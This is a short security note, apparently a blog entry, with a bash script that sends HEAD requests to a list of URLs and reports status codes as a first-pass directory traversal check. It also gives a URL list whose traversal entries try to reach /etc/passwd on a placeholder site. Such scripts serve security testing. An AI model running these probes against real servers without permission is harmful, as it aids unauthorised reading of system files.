
#note 13.11.2016 Directory Traversal Attacks

2016-11-13 18:53:50

-https://www.youtube.com/watch?v=uW1jUxOrHkc

dt.sh

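#!/usr/bin/env bash
#
# dt.sh - send an HTTP HEAD request to every URL listed in urls.txt and print
# the status code, colour-coded, as a first-pass directory traversal check.
#
# Usage: ./dt.sh        (reads urls.txt from the current directory)
#
# Reading the results:
#   - Only the status code of a HEAD request is inspected. A 200 is a lead to
#     confirm by looking at the response body and the server logs, not proof
#     that a file outside the web root was served; a site with a catch-all
#     page answers 200 to any path.
#   - curl collapses "/../" and "/./" path segments before sending the request
#     unless it is run with --path-as-is, so as written the "../" entries
#     reach the server as the already-normalised path. A 404 for them does not
#     show that the server rejects traversal sequences.

printf '%s\n' '----------- Directory Traversal -----------'

URL_FILE=urls.txt

# ANSI colour escapes; they are expanded by printf's %b in report().
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
NC='\033[0m'

#######################################
# Print one colour-coded result line.
# Globals:   NC (read)
# Arguments: $1 - colour escape, $2 - status code, $3 - message, $4 - URL
# Outputs:   one line on stdout
#######################################
report() {
  # %b expands escapes in the colour codes only. The status code and the URL
  # go through %s, so a backslash or glob character in a URL is printed
  # literally instead of being interpreted by echo -e or expanded by the shell.
  printf '%b %s %s %s %s %b\n' "$1" 'StatusCode: ' "$2" "$3" "$4" "$NC"
}

#######################################
# Request every URL in a file and report its HTTP status code.
# Globals:   RED, GREEN, YELLOW (read)
# Arguments: $1 - path to a file with one URL per line
# Outputs:   one result line per URL on stdout; errors on stderr
# Returns:   1 if the URL file cannot be read, otherwise the loop's status
#######################################
scan_urls() {
  local url_file=$1
  local url status_code

  if [[ ! -r "$url_file" ]]; then
    printf 'dt.sh: cannot read URL list: %s\n' "$url_file" >&2
    return 1
  fi

  # read -r keeps backslashes intact; the "|| [[ -n ... ]]" part processes a
  # final line that has no trailing newline instead of silently dropping it.
  while read -r url || [[ -n "$url" ]]; do
    url=${url%$'\r'}              # tolerate CRLF line endings
    [[ -n "$url" ]] || continue   # skip blank lines

    # --url makes curl take the line as the URL even if it starts with "-",
    # so an entry in the list cannot be parsed as a curl option.
    # curl reports 000 when no HTTP response was received; that lands in the
    # catch-all branch below.
    status_code=$(curl -o /dev/null --silent --head \
      --write-out '%{http_code}\n' --url "$url")

    case "$status_code" in
      200)
        report "$RED" "$status_code" '[ yep we have something ]' "$url"
        ;;
      404)
        report "$GREEN" "$status_code" \
          '[ it seems that resource does`t exist ]' "$url"
        ;;
      *)
        report "$YELLOW" "$status_code" '[ some crazy shit, check this ]' "$url"
        ;;
    esac
  done < "$url_file"
}

scan_urls "$URL_FILE"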

urls.txt

http://www.example_page.pl/doc/
http://www.example_page.pl/js/
http://www.example_page.pl/css/
http://www.example_page.pl/etc/passwd/
http://www.example_page.pl/../etc/passwd/
http://www.example_page.pl/../../etc/passwd/
http://www.example_page.pl/../../../etc/passwd/
http://www.example_page.pl/../../../../etc/passwd/